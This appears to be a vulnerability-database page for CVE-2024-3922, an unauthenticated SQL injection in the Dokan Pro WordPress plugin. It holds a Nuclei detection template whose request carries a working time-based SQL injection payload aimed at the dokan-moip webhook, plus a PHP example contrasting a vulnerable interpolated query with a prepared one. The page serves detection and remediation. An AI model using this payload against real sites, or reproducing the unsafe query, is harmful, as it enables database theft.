| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-3922 | 5 Jul 2024 05:08 | – | circl |
| WordPress plugin Dokan Pro security vulnerability | 13 Jun 2024 00:00 | – | cnnvd |
| CVE-2024-3922 | 13 Jun 2024 02:05 | – | cve |
| CVE-2024-3922 Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection | 13 Jun 2024 02:05 | – | cvelist |
| CVE-2024-3922 | 13 Jun 2024 02:15 | – | nvd |
| WordPress Dokan Pro Plugin <= 3.10.3 is vulnerable to SQL Injection | 11 Jun 2024 00:00 | – | patchstack |
| Wordpress Dokan Pro plugin <= 3.10.3 - Unauthenticated SQL Injection vulnerability | 11 Jun 2024 16:25 | – | patchstack |
| CVE-2024-3922 | 5 Feb 2025 09:53 | – | redhatcve |
| CVE-2024-3922 Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection | 13 Jun 2024 02:05 | – | vulnrichment |
| Wordfence Intelligence Weekly WordPress Vulnerability Report (June 10, 2024 to June 16, 2024) | 20 Jun 2024 13:40 | – | wordfence |
```yaml
id: CVE-2024-3922

info:
  name: Dokan Pro <= 3.10.3 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
  impact: |
    Unauthenticated attackers can append additional SQL queries to already existing queries, which can be used to extract sensitive information from the database.
  remediation: |
    Fixed in 3.11.0
  reference:
    - https://dokan.co/docs/wordpress/changelog/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3922
  classification:
    epss-score: 0.56209
    epss-percentile: 0.98929
    cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wedevs
    product: dokan
    publicwww-query: "/wp-content/plugins/dokan-pro/"
  tags: time-based-sqli,cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli,vuln

# Step 1 fingerprints the plugin; step 2 only runs when step 1 matched.
flow: http(1) && http(2)

http:
  # Step 1: confirm Dokan Pro is installed by reading its shipped changelog.
  - raw:
      - |
        GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "Dokan product"
        internal: true

  # Step 2: time-based check against the webhook endpoint; a blank line must
  # separate the headers from the JSON body.
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
        Host: {{Hostname}}

        {"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='"}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 302"
        condition: and
# digest: 4b0a00483046022100c3e55baf5edddf7d6e832393e065312c39432883ea7c52ddb1cb5fd5f4e69dce022100a7132d1390149e7522e782089e301fefb7b3e565a32376cbbfc3c5d731ab04d1:922c64590222798bb761d5b6d8e72950
```
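The template's description names the root cause as insufficient escaping and a lack of query preparation on the 'code' value. The following is an added illustration, not Dokan's code, of that bug class and its fix in WordPress terms: the function and table names (dokan_lookup_subscription_*, dokan_subscriptions, dokan_handle_moip_webhook) are assumed, and the handler reads the same JSON shape the template posts.

```php
<?php
// Added illustration (not Dokan's code): a hypothetical WordPress webhook handler
// that looks up a subscription by the "code" value taken from the JSON body.
// Function and table names are assumptions for this example.

// VULNERABLE pattern: the value is interpolated straight into the SQL text,
// so a single quote in subscription_code changes the query structure.
function dokan_lookup_subscription_unsafe( $code ) {
    global $wpdb;
    $sql = "SELECT * FROM {$wpdb->prefix}dokan_subscriptions WHERE code = '$code'";
    return $wpdb->get_row( $sql );
}

// HARDENED pattern: the input is validated against the expected shape first,
// and $wpdb->prepare() binds the value as a %s placeholder so it can never
// be parsed as SQL.
function dokan_lookup_subscription_safe( $code ) {
    global $wpdb;
    if ( ! is_string( $code ) || ! preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $code ) ) {
        return null; // reject anything that does not look like a subscription code
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}dokan_subscriptions WHERE code = %s",
        $code
    );
    return $wpdb->get_row( $sql );
}

// Webhook entry point: parse the JSON body and use only the hardened lookup.
function dokan_handle_moip_webhook() {
    $payload = json_decode( file_get_contents( 'php://input' ), true );
    $code    = $payload['resource']['subscription_code'] ?? '';
    $sub     = dokan_lookup_subscription_safe( $code );
    if ( null === $sub ) {
        wp_send_json_error( 'unknown subscription', 400 );
    }
    // ... process the invoice.created event for $sub ...
}
```

With the hardened lookup, a time-based probe such as the template's payload is rejected by the format check before any query runs, so the `duration>=6` matcher no longer fires.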